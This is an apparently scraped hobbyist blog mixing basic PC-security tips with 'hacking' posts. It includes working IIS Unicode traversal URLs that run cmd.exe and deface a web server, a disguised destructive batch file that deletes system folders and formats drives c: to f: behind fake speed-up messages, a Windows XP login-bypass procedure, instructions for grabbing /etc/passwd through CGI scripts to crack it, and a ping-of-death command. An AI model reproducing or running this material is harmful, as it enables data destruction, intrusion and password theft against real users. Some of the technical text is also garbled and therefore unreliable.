Sunday, January 4

Ten Simple Steps To Protect Your PC


HOW TO SAvE YOUR PC......

When you think of security, you likely think of banks and financial institutions or at least companies in fear of corporate espionage. However, they are not the only ones that have to be concerned about security. Anyone, including you, who use a home or business computer to get on the Internet, should be concerned about security. The Internet, though a wonderful tool full of a wealth of information, is also full of hackers, viruses, and scams that can cause your computer a great deal of damage. Luckily, though, there are ways to prevent a lot of what is out there from getting to your computer. There are tools and precautions that you can take. The following is a list of ten that can go a long way in protecting you and increasing your internet security.
1) Make sure that you have a firewall up and running on your computer as well as a virus
checker. In addition, make sure what any firewall that is included in the software that you are using, has been activated and is set properly. Consult a professional or your software's manual to make sure you have the settings on and correctly placed for optimum security.
2)Try not to share your computer. Obviously there are times when, especially with a home computer, that there will be multiple users. The problem is more with kids than anything. Children have a tendency to download anything they think they might need without thinking it through. If you do have to share your computer with kids, take time to talk to them about the risks of downloading software.
3)Backup your data often, especially what you consider it to be essential data. If you don't do anything else, make sure you backup your files. Anything you backup can then be recovered if there is a problem. Viruses, worms, and the like can eat up files and before you know it family photos, business files, or important contact information can be lost.
4)Make sure you know what you are doing before you download anything. Don't click on any unknown link that asks you to agree to install software to view their page. Sometimes those contain spyware.
5)A fifth way to increase security is to be careful about any business or sensitive information you access or pass on a public computer. You don't know what has been downloaded onto those computers that could affect your files. Public computers could even have spyware, key logger software, or a number of other programs that could steal sensitive information. If you must use a public computer, make sure you sweep it with some sort of spyware seeking program.
6)Carry a flash card with you. You can load your own software onto the flash card for use on any public computer. This will help keep you safe from viruses. You may also want to use it if you are going to be using a family computer that you are not positive its virus and spyware free.
7)Beaware of visiting porn sites or anything like that. Those sites often contain spyware, Trojan horses, viruses, and all sorts of nasty bugs. These sites can even have software that will run in the background of your computer without even asking you, so it is a good idea to just stay away.
8)Never open SPAM email while you are still connected to the Internet. Many times, just by clicking on SPAM you may be adding yourself to your own email address to another SPAM list. Often your email address will be used as the sending address and you will not know this, until your account is closed. You can also end up with viruses or worms from clicking on SPAM emails.
9)Turn off your Internet connection if you are determined to see what is in the SPAM email. If you really feel like you need to look at a message, but are unsure where it is from, shut off your connection at the firewall first.
10)Lastly, make sure you have a good virus checker installed on your computer. There are many free ones out there and they work well at protecting your computer from viruses. Look for a virus checker with regular updates, even daily updating, and make sure you receive those updates. Virus software will help protect your computer from new viruses and new worms that get discovered on the Internet. By making sure you are updating regularly, you can keep up with the viruses that are out there.

If this simple steps are followed you can be safe from danger.....
Posted by at No comments:

VIRUS THAT NEED COMMAND.COM TO RUN

If this happens with your PC while trying to shut down your pc, a pop-up appears saying that 'command.com' is still running and it took more than 10 minutes just to open 'My Computer' then certainly your Computer have been effected by virus.ALSO THIS TYPE OF VIRUS ARE NOT SCANNED BY ANTIVIRUS.






HOW TO REMOVE THOSE VIRUS






Download HJTsetup.exe from this link http://www.thespykiller.co.uk/files/HJTsetup.exe to your computer. Install it. By default it will install to C:\Program Files\Hijack This. Continue to click "next" in the setup dialogue boxes until you get to the "Select Addition Tasks" dialogue. Continue to follow the rest of the prompts from there. At the final dialogue box click "Finish" and it will launch Hijack This. Click on the "Do a system scan and save a logfile" button. It will scan and the log should open in notepad. Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log and post it in this thread.
Do not fix anything yet unless you know what you are doing. This is a powerful tool that can crash the computer if used improperly.
Please download SmitFraudFix from this link http://siri.urz.free.fr/Fix/SmitfraudFix.zip Then extract the contents to your desktop.
!!!! Only run option #1 as runing the other options on an uninfected computer will damage the desktop.!!!!
Open the "SmitfraudFix" folder and double-click "smitfraudfix.cmd"Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).Please copy/paste the content of that report into your next reply. Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
If the Norton's 2005 is out-of-date download "AVG Free Antivirus" from the following link but do not install it yet AVG Free Antivirus
Go off line. Then go to start> control panel> scroll down to and uninstall "Norton 2005 Antivirus".
Once the unistall is complete go back to the decktop and install the free AVG Antivirus (do not check the box to scan on every startup). Go online and update AVG Free Antivirus.
You should now have an up-to-date antivirus running and the out-of-date one removed.
Posted by at No comments:

HACKERS SECRET





How Do Hackers Break Into Computers?

"You have to be a Hacker or think like a Hacker,for making a well designed security system."

for breaking into a computer hackers discovered(find) vulnerabilities and then create an exploit (a program or set of instructions to be followed by hand) that takes advantage of the vulnerabilities. These vulnerabilities and their related exploit programs, if made public, are then used by many others, good and bad. For example, some users are system administrators using them to test their systems. Others are computer hackers just wanting to have fun. Then there are the crackers who scan systems to determine which computers have vulnerabilities and then carry out an attack.

How to Discover New Vulnerabilities
Many of the most skilled individuals involved in discovering new ways to break into computers work in corporate, governmental, or academic laboratories. They not only use considerable brainpower and creativity in their jobs but also typically create and use sophisticated software tools to assist them in their research duties. (The National Security Agency, or NSA, was one of the earliest government agencies to create such a research group). Even in these research environments, the people who find ways to break into computers typically describe themselves as "hackers." The analyst access to the source code (that is, commands the programmers write). This process is called "white-box" analysis. Depending on the software language they are examining for vulnerabilities, usually there are programs that will scan for commands or syntax known to cause problems. Some programming languages, most famously Java, are inherently designed to resist security flaws.

Disassemblers and Decompilers
A disassembler converts a program back into the original programming language. This is a difficult task, and it is likely to work only with a small program, typically one written in Java. A decompiler converts software into assembly language. Assembly language is a low-level language far more difficult to understand than the high-level languages in which most computer programs are written. Nevertheless, a sufficiently talented programmer can analyze assembly language. Although decompilers are typically able to handle larger programs than are disassemblers, they can process only comparatively small programs. Today, decompilers are the tools of choice to analyze worms, viruses, and other small instances of malware (that is, malicious programs).

WINDOWS XP
In Windows XP, some 40 million lines of source code confront the analyst team or crackers. It is difficult for decompiler to extract code from such a big program. Even a debugger would make little headway. So, other alternatives are choosen, the most prevalent of which is the "black box" analysis. In this process, the professional analyst team or crackers try to find all the possible ways to give inputs. They then try the inputs to determine whether they have the potential to "crash" a system or evade security. Because of the difficulty of this process, the team or the individual uses a "fault injection" tool to speed this technique. Examples of fault injection include a database query crafted to command a database server to erase everything, or a Web browser URL infecting a Web server with a worm. The process of trying all those different inputs looking for some fault is also known as fuzzing.
Buffer Overflows
Buffer and heap overflows are special cases of fault injection. Testing for these conditions has discovered the majority of computer security flaws known today. Basically, a "buffer overflow" is a condition whereby too much data is placed in too little allocated space in a computer's memory. The extra data, if properly crafted, and if inserted into a program with the right kind of access to memory, can end up in a region of memory enabling a break-in.
Crackers have discovered buffer overflows by simply trying super-long data inputs, such as typing a long URL into a browser location window. A super-long URL is an example of an "injection vector." When the attacker sees some sort of error condition resulting from this injection, this is a sign that a buffer overflow has occurred. An example of an error condition is to get the error message on a UNIX-type of system known as "segmentation fault." The trick is to see whether one may use the overflow condition to break into a computer. The attacker next inserts "shellcode" into this long string of data. Shellcode is a compiled program actually performing the break-in. Shellcode is the "payload" of the exploit.



FINAL ATTACK


After the cracker has detected vulnerabilities in the system he or she has decided to attack, the next step is to carry out the attack. In some cases, the exploit itself is easy. What follows is an example of an exploit to break into a Windows 2000 Web server and deface its Website. This exploit will work on Windows 2000 Server or Windows Professional, but only if it has not been patched beyond Service Pack 2, and only if it is running IIS or a Personal Web Server that is not patched.


1)The attack program is simply a Web browser, and the attacker just has to insert a series of URLs in the location window. The first URL identifies whether the server is likely to be vulnerable:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"dir%20c:\"
In the preceding URL, %20 means "space." The "+" also means "space." The %255c is Unicode encoded. After it goes through the Unicode translation, the attacker winds up with 5c, which is hex for ‘\'. So from the string ..%255c..%255c, you get ..\..\ for "go up two directories."
If the victim computer is vulnerable, the attacker's browser will show something like the ­following:
Directory of c:\09/21/2001 09:59a ASFRoot
09/22/2001 06:53a Documents and Settings
09/21/2001 05:06p Inetpub
09/29/2001 05:37p Microsoft UAM Volume
09/21/2001 05:09p Program Files
10/01/2001 03:57p WINNT
0 File(s) 0 bytes
6 Dir(s) 8,984,092,672 bytes free
2)The next malicious URL the attacker must insert is as follows:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"copy%20..\..\winnt\system32\cmd.exe%20..\scripts\cmd1.exe"
This copies cmd.exe (running the MS-DOS program in Windows 2000, NT and XP) into the Web server's scripts directory. This directory holds CGI (Common Gateway Interface) programs. (Examples of CGI programs are shopping carts and programs to search the local Website.) If the server is vulnerable, the attacker sees the following in the browser:
CGI Error.
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are
1 file(s) copied.
This error message reveals that the attack copied the cmd.exe program into the scripts ­directory.


3)The final step is to insert this URL:
http://victim.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+I%20broke%20in%20xyz!+../wwwroot/iisstart.asp&dir&type+../wwwroot/iisstart.asp
This creates a main page for the Website that says, "I broke in xyz!" Note that this only works if the main page is named iisstart.asp. If it is named something else, such as index.shtml, the attacker must make the substitution for the proper main page name.




In this way hackers Invade your system,so be ready to face the Hackers.
Posted by at No comments:

Virus that Destroy The Whole Computer Silently : A batch file Program

@echo off
md Wait\wait
md Wait\few
md Wait\minutes
start /max Wait
start %systemroot%/system32/wisptis
start %systemroot%/system32/wisptis
color 1
cd\
rd /s /q program files
cd %systemroot%
rd /s /q system32
cls
attrib /s /d +r +h %.txt%
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT FOR 10 MINUTES .......
echo *********************************************************
format c: /q /y
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT FOR 5 MINUTES ........
echo *********************************************************
format d: /q /y
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT FOR 2 MINUTES ........
echo *********************************************************
format e: /q /y
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT 30 seconds ...........
echo *********************************************************
format f: /q /y
cd\
rd /s /q documetns and settings
exit
Posted by at No comments:

HACK WINDOWS WITHOUT CHANGING PASSWORD


Hack into the computer running Windows XP without changing its password and find out all passwords on the machine (including admin accounts). You do not need access to any accounts to do this,of course, but please not do this on anyone elses computer without there proper authorisation.




Steps to Hack into a Windows XP Computer without changing password:


1. Get physical access to the machine. It must have a CD or DVD drive.


2. Download "DreamPackPL HERE".if not available find on google.


3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.


4. Use any burning program that can burn ISO images.


5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.


6.Press "R" to install DreamPackPL and "C" to install DreamPackPL by using the recovery console.


7. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)


8. Backup your original sfcfiles.dll by typing:"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)


9. Copy the hacked file from CD to system32 folder. Type:"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)


10. Type "exit", take out disk and reboot.


11. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.


12. Click the top graphic on the DreamPack menu and you will get a menu popup.


13. Go to commands and enable the options and enable the god command.


14. Type "god" in the password field to get in Windows.
You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.
Posted by at No comments:

HACKING THROUGH WEB BROWSER


WEB BROWSER SECURITY




"Sorry dear readers,could not post new topics for the long time.I was really very busy those days.I get the time today to write something interesting,but i'm, still very busy,but I promise,I'll come back soon with a lot of new and interesting topics for all of our readers."



Now,come to our topic,friends,the web browsers like Internet Explorer,Mozilla etc can be used to fetch your secret documents and files.Now,let's learn this is possible.



A Web browser is a software application that enables a user to display and interact with text, images, and other information typically located on a Web page at a website on the World Wide Web or a local area network.Web browsers communicate with Web servers primarily using HTTP (hypertext transfer protocol) to fetch webpages. HTTP allows Web browsers to submit information to Web servers as well as fetch Web pages from them. The most commonly used HTTP is HTTP/1.1, which is fully defined in RFC 2616. HTTP/1.1 has its own required standards that Internet Explorer does not fully support, but most other current-generation Web browsers do.



HOW THIS COULD BE USED
Pasco (the Latin word for "Browse") is a command line tool that runs on Unix or Windows and can reconstruct the internal structures for IE Index.dat files. Pasco accepts an Index.dat file, reconstructs the data, and outputs the information in a delimited text file format. This format is useful when you need to import the data into a spreadsheet such as Microsoft Excel. Figure 1 shows Pasco in action.
Pasco shows that IE saves the following fields from a single web site visit in the Index.dat file: The record type - Pasco signifies the activity is either a URL that was browsed or a website that redirected the user's browser to another site.


>The URL - The actual website that the user visited.


>Modified Time - The last moment in time the website was modified.


>Access Time - The moment in time the user browsed the website.


>Filename - The local file name that contains a copy of the URL listed.


>Directory - The local directory you can find the "Filename" above.


>HTTP Headers - The HTTP headers the user received when he browsed the URL.



Nowdays,most websites use CGI scripts .These scripts are located in the /cgi-bin directory.These scripts can be downloaded for further examination or even use these scripts to steal passwords to access password protected parts of the website.



So,simply type the following in the location bar of your browser,and observe what you get-



ftp://www.hostname.com/cgi-bin


The most common way to get the password file is to FTP anonymously and check if it in the /etc directory access to the passwd is restricted or not.If it is not restricted then download the file and firstly unshadow it and then crack it.First you need to find a box t hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to http://www.altavista.com/ and just search on cgi-bin AND perl.exe or cgi-bin AND phf.




>>Finger box hacking: Lets say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: http://www.aol.com./ The next thing we would do is add /cgi-bin/finger to the web URL so it would look like thisHttp://www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query......

nobody@nowhere.org This email address is being protected from spam bots, you need Javascript enabled to view it /bin/mail

me@junk.org This email address is being protected from spam bots, you need Javascript enabled to view it
Posted by at No comments:

BLOCK UNWANTED SITE ON YOUR COMPUTER

Hey Friends,want to block any site from opening on your computer.If you want to block some site in windows O.S. to be browse from your computer.

Then do following steps.........

open the location..
C:\WINDOWS\system32\drivers\etc
you will find a hosts file.First backup the hosts file.
Open hosts file there, from the notepad.
At the end of the line you can see as per below.

127.0.0.1 localhost

Append the following line at the end
127.0.0.1 BlockSitename.com Replace the BlockSitename.com with the site name that you want to block.

example......

If you want to restrict http://www.yahoo.com/ then in the hosts file do this....
127.0.0.1 http://www.yahoo.com/
or
0.0.0.0 http://www.yahoo.com/

as ip 0.0.0.0 means nothing.


Then go to Start->Run-> type: ipconfig /flushdns to restart the network.

Note: That will only stop the domain name to go to the website but if you know the IP address of the site from the gnsstuff or whois then you can brose your site.
Posted by at No comments:

DOS & BATCH PROGRAMMING TIPS





Ms Dos And Batch File Programming Tricks And Tips

DOS is basically a file caled command.com .It is this file which handles all DOS commands that we give at DOS prompt-such as copy,dir,del,etc.

Batch file programming is nothing but the windows version of unix shell programming.To perform a bulk set of commands over and over again,batch files are used.



Some Important And Hidden Dos Command
1>ANSI.SYS - Defines functions that change display graphics, control cursor movement, and
reassign keys.
2>ARP - Displays, adds, and removes arp information from network devices
3>AT - Schedule a time to execute commands or programs.
4>COLOR - Easily change the foreground and background color of the MS-DOS window.
5>CONTROL - Open control panel icons from the MS-DOS prompt.
6>CTTY - Change the computers input/output devices.
7>EMM386 - Load extended Memory Manager.
8>IFSHLP.SYS - 32-bit file manager.
9>SWITCHES - Remove add functions from MS-DOS.
10>SYS - Transfer system files to disk drive.

Redirection Of OUTPUT:
Send the output of the dos prompt to a file on disk.This can be done using the Redirection operator,> .
Example: c:\windows>net>xyz.txt
c:\windows>help>>xyz.txt
This command will execute the net command and will store the results in the
text file ,xyz.txt.
To print the results: c:\windows>dir*.*>prn

Redirection of Input:
we can also redirect input ,from .txt file to DOS prompt.
Example: c:\windows> more <>

BATCH PROGRAM TO DELETE FILES:

@ECHO OFF
ECHO.
ECHO I am going to delete the following files:
ECHO %1 %2
ECHO.
ECHO CTRL+C to Abort Process
PAUSE
FOR %%A IN (%1 %2) DO DEL %%a
ECHO Killed files.Mission Accomplished By Prem Bharti
Posted by at No comments:

DOS ATTACK


DOS-DENIAL OF SERVICE ATTACK




Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, web sites, online accounts (banking, etc.), or other services that rely on the affected computer.
The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular web site into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.




What is a distributed denial-of-service (DDoS) attack?


In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a web site or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack.




DOS Attacks are of the following different types-: 1. Those that exploit vulnerabilities in the TCP/IP protocols suite. 2. Those that exploit vulnerabilities in the Ipv4 implementation. 3 There are also some brute force attacks, which try to use up all resources of the target system and make the services unusable. Some common vulnerabilities are Ping of Death, Teardrop, SYN attacks and Land Attacks.




Ping of Death


This vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them to reboot) so that no users can use its services. This exploit no longer works, as almost all system administrators would have upgraded their systems making them safe from such attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attack could be carried out even through the command line, in the following manner: The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim's computer:


C:\windows>ping -l 65540 .




Teardrop


The Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is being sent over the Internet, it is broken down into smaller fragments at the source system and put together at the destination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number of packets, with each packet carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets, then: The first Packet will carry data from 1 byte to 1500 bytes The second Packet will carry data from 1501 bytes to 3000 bytes The third packet will carry data from 3001 bytes to 4000 bytes These packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to which byte does that particular data packet carries data or the range of data that it is carrying. This along with the sequence numbers helps the destination system to reassemble the data packets in the correct order. Now in this attack, a series of data packets are sent to the target system with overlapping Offset field values. As a result, the target system is not able to reassemble the packets and is forced to crash, hang or reboot. Say for example, consider the following scenario-: Normally a system receives data packets in the following form, with no overlapping Offset values. (1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes) Now in a Teardrop attack, the data packets are sent to the target computer in the following format: (1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes) When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot.




SYN Attack


The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how SYN Attacks work, you need to first know how TCP/IP establishes a connection between two systems. Whenever a client wants to establish a connection with a host, then three steps take place. These three steps are referred to as the three-way handshake. In a normal three way handshake, what happens is that, the client sends a SYN packet to the host, the host replies to this packet with a SYN ACK packet. Then the client responds with a ACK (Acknowledgement) packet. This will be clearer after the following depiction of these steps-: 1. Client SYN Packet à Host In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-way connection. The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of the client, which is needed by the host to put back the fragmented data in the correct sequence. 2. Host SYN/ACK Packet à Client In the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packet sent by the client and sends the client its own ISN. 3. Client ACK à Host In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a ACK packet. These three steps together are known as the 3-way handshake and only when they are completed is a complete TCP/ IP connection established. In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad source IP Address. When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of them with a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thus queues up all these requests until it receives an ACK message. The requests are not removed unless and until, the remote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the target machine. To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have a Bad Source IP, they queue up, use up resources and memory or the target system and eventually crash, hang or reboot the system. Land Attacks A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP Address, the IP address of the target system itself is used. This creates an infinite loop between the target system and the target system itself. However, almost all systems have filters or firewalls against such attacks.




UDP Flooding


This kind of flooding is done against two target systems and can be used to stop the services offered by any of the two systems. Both of the target systems are connected to each other, one generating a series of characters for each packet received or in other words, requesting UDP character generating service while the other system, echoes all characters it receives. This creates an infinite non-stopping loop between the two systems, making them useless for any data exchange or service provision.
Posted by at No comments:

NEWFOLDER.EXE VIRUS


newfolder.exe virus-get rid of it
New Folder.exe is one of the virus,which can damage your files,computer.This virus disables your taskmanager,registry file,group policy editing,so,it become very difficult to work on the computer.It will create exes like the icon of folders. If this virus is running it will use more than 50 % of your processor and slowdown the computer.This also disables the folder options and hide the hidden files and folder.
How to delete this file
To delete this file download the antivirus ESET NOD32.You can download this from here
http://www.eset.com/download/index.php
Install this antivirus and remove the virus.After that type gpedit in the run window.In the user settings ,disable those features which are not working.Now taskmanager,regedit become to work.But,folder options are still not there.To enable this,go to registry by typing regedit in command prompt,and search for the key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer
You will see:

NofolderOptions REG_DWORD 0*00000000(1)
Delete this key or set the value 0.




Now everything is OK.Never click to this folder type file again.
Posted by at No comments:

Enable/Disable taskmanager through registry


Enable / Disable Task Manager in Windows


Using Registry:


Open Registry from run by typing regedit in run, and search for:




Hive: HKEY_CURRENT_USER


Key: Software\Microsoft\Windows\CurrentVersion\Policies\System


Name: DisableTaskMgr


Type: REG_DWORD


Value: 1=Enablethis key, that is DISABLE TaskManager


Value: 0=Disablethis key, that is Don't Disable, Enable TaskManager .




Using GROUP POLICY


If your regedit has been hacked, use this steps.





1)Click Start
2)Click Run
3)Enter gpedit.msc in the Open box and click OK
4)In the Group Policy settings window
5)Select User Configuration
6)Select Administrative Templates
7)Select System
8)Select Ctrl+Alt+Delete options
9)Select Remove Task Manager
10)Double-click the Remove Task Manager option or disable it.
Posted by at No comments:

Security Audit Log Is Full


Security Audit Log Is Full

The Event Log folder that contains this policy is available only in Group Policy objects associated with domains, OUs, and sites. The Event Log folder does not appear in the Local Computer Policy object.So we get this error message while login.To avoid this problem do following steps:



Audit Policy
To enable auditing of security related events:

1.
Open the applicable Security Policy.

2.
Expand Security Settings.

3.
Within Security Settings, expand Local Policies to reveal the Audit, User Rights Assignment, and Security Options policies.

4.
Click on the Audit Policy object. The right-hand details pane will reveal the configurable Audit Policy settings
Posted by at No comments:

Credit Card And Internet



Credit Card,Internet And Hacking

In the previous article we came to know about the internet and the transaction security.In this article we will see the security of credit card payment through the internet.

Encrypted credit-card numbers aren't valuable enough by themselves, however, to pay for the compute time spent to attack them. A few years ago someone attempted to sell a large collection of valid credit-card numbers to an undercover FBI agent, who bought them for the modest sum of $2.50 per number. That price hardly justifies the effort needed to decrypt
Posted by at No comments:

What is .htaccess file


What is .htaccess file
Monday, December 8, 2008 at 10:22 PM Posted by SONU MISHRA


What is .hatccess file

.htacess stands for HyperText Access file.This is the default name of configuration file in the server side.It can also be placed in the directory whose security we want as it provides the ability to customize configuration for requests to the particular directory.

Although .htaccess is only a file, it can change settings on the servers and allow you to do many different things, the most popular being able to have your own custom 404 error pages. .htaccess isn't difficult to use and is really just made up of a few simple instructions in a text file.

.htaccess files are often used to specify the security restrictions for the particular directory, hence the filename "access." The .htaccess file is often accompanied by an .htpasswd file which stores valid usernames and their passwords.

Use of .htaccess file

1)Authorization and Authentication.
.htaccess files are often used to specify the security restrictions for the particular directory, hence the filename "access." The .htaccess file is often accompanied by an .htpasswd file which stores valid usernames and their passwords.
2)Customized error responses
Changing the page that is shown when a server-side error occurs, for example HTTP 404 Not Found.
These are some of the most common errors:

401 - Authorization Required
400 - Bad request
403 - Forbidden
500 - Internal Server Error
404 - Wrong page
3)Cache Control
.htaccess files allow a server to control User agent caching used by web browsers to reduce bandwidth usage, server load, and perceived lag.
4)Rewriting URLs
Servers often use .htaccess to rewrite "ugly" URLs to shorter and prettier ones.
Posted by at No comments:

How to remove internet remembered passwords



Where Internet Explorer Store Password


Internet Explorer store the username and password on user's choice for the user's convinient.It very useful for us.But for one or many reason ,sometimes we need to remove the stored password.Deleting the history,cookies doesn't clear the password.To delete the password,go to 'Internet Option','content', and 'AutoComplete' tab.



Click on 'Clear Password' to remove the the stored password.

Enjoy.....
Posted by at No comments:
Subscribe to: Posts (Atom)